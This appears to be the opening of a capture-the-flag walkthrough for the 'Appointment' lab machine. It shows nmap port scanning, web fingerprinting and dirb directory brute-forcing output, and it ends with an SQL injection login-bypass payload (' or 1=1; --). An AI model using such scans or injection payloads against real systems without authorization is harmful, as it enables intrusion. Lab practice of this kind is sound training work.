Appointment
Port recognition withnmap
or you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon appointment.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
WWA for the #15 !
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 11:15 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:15
Completed NSE at 11:15, 0.00s elapsed
Initiating Ping Scan at 11:15
Scanning appointment.htb (10.129.125.216) [4 ports]
Completed Ping Scan at 11:15, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:15
Scanning appointment.htb (10.129.125.216) [65535 ports]
Discovered open port 80/tcp on 10.129.125.216
Completed SYN Stealth Scan at 11:15, 14.40s elapsed (65535 total ports)
NSE: Script scanning 10.129.125.216.
Initiating NSE at 11:15
Completed NSE at 11:15, 0.00s elapsed
Nmap scan report for appointment.htb (10.129.125.216)
Host is up (0.067s latency).
Not shown: 65336 closed tcp ports (reset), 198 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 11:15
Completed NSE at 11:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
Raw packets sent: 71640 (3.152MB) | Rcvd: 67934 (2.717MB)
[+] [fuzzin server]
http://appointment.htb [200 OK] Apache[2.4.38], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.129.125.216], JQuery[3.2.1], PasswordField[password], Script, Title[Login]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 21 11:15:56 2022
URL_BASE: http://appointment.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://appointment.htb:80/ ----
==> DIRECTORY: http://appointment.htb:80/css/
==> DIRECTORY: http://appointment.htb:80/fonts/
==> DIRECTORY: http://appointment.htb:80/images/
+ http://appointment.htb:80/index.php (CODE:200|SIZE:4896)
==> DIRECTORY: http://appointment.htb:80/js/
+ http://appointment.htb:80/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://appointment.htb:80/vendor/
-----------------
END_TIME: Thu Jul 21 11:21:15 2022
DOWNLOADED: 4612 - FOUND: 2
recon http web service on port 80

We have a login

Trying SQL injection ' or 1=1; --
